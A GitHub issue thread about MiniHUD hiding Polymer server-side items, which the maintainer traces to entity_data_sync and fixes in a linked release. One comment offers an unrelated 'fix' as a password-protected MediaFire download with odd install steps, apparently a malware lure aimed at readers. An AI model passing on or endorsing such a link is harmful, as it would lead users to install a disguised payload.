### ISSUE TITLE
[Bug] Rendering Incompatibility with Polymer Mods on Servers

### ISSUE THREAD

**Issue by borisshoes** [sakura-ryoko/minihud#52]
Polymer is a framework used by Server-Sided mods to allow custom item implementation only on the server side. Polymer-implemented custom items are sent as a vanilla minecraft item stand-in to clients, usually with a CustomModelData flag to be used in conjunction with a resource pack.

Having MiniHud enabled while playing on a server with polymer-based mods causes any polymer-based items to disappear from rendering when being put in an item frame, held by another player, or worn as armor. Using Freecam from Tweakaroo also causes all of the above to happen instantly to all rendered polymer items, on top of causing any items in the players hotbar and inventory to no longer render.

Demonstration: [https://youtu.be/IJ3uOBPBkHU](https://youtu.be/IJ3uOBPBkHU)

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by sakura-ryoko** [comment]
I have spoken with Patbox about this issue, and the problem seems to be related to MiniHUD (And Tweakeroo / Litematica)'s implementation of how their entity_data_sync protocols function.  They are currently Overwriting your modded items' data.

Let me know if the problem still happens if you completely disable the entity_data_sync features of all 3 of these mods.

**Comment by borisshoes** [comment]
Thanks for the information! I have found that the bug occurs for only OP'd players when Servux is not installed on the server, but for all players when Servux is installed. The settings in Tweakaroo and Litematica seem irrelevant to causing the bug. Changing the EntityDataSync features on MiniHUD stops the bug completely when selecting the correct setting for whether or not the server has Servux installed.
Will I lose any important functionality of MiniHUD leaving data sync disabled? 
Also, I hate to ask, but would you consider a compatibility patch at some point?

**Comment by sakura-ryoko** [comment]
Yes, your Info Lines Server Entity Data (Such as Looking At Entity, and Beehives, etc), and inventory Preview features in MiniHUD will fail to function without the entity_data_sync features enabled.

**Comment by sakura-ryoko** [comment]
FYI there is a fix coming for this problem that I've been working on under Snapshot.

**Comment by borisshoes** [comment]
Awesome! I look forward to it!

**Comment by sakura-ryoko** [comment]
> Awesome! I look forward to it!

https://github.com/sakura-ryoko/minihud/releases/tag/1.21-0.32.50-sakura.1

It's a massive update, and best used with Servux.  It's not a "Compatibility patch", per-se its more of a "don't do what it used to" update, while still trying to maintain the same level of Entity Sync capabilities, if not better; but the updated code makes it more compatible; I would assume.
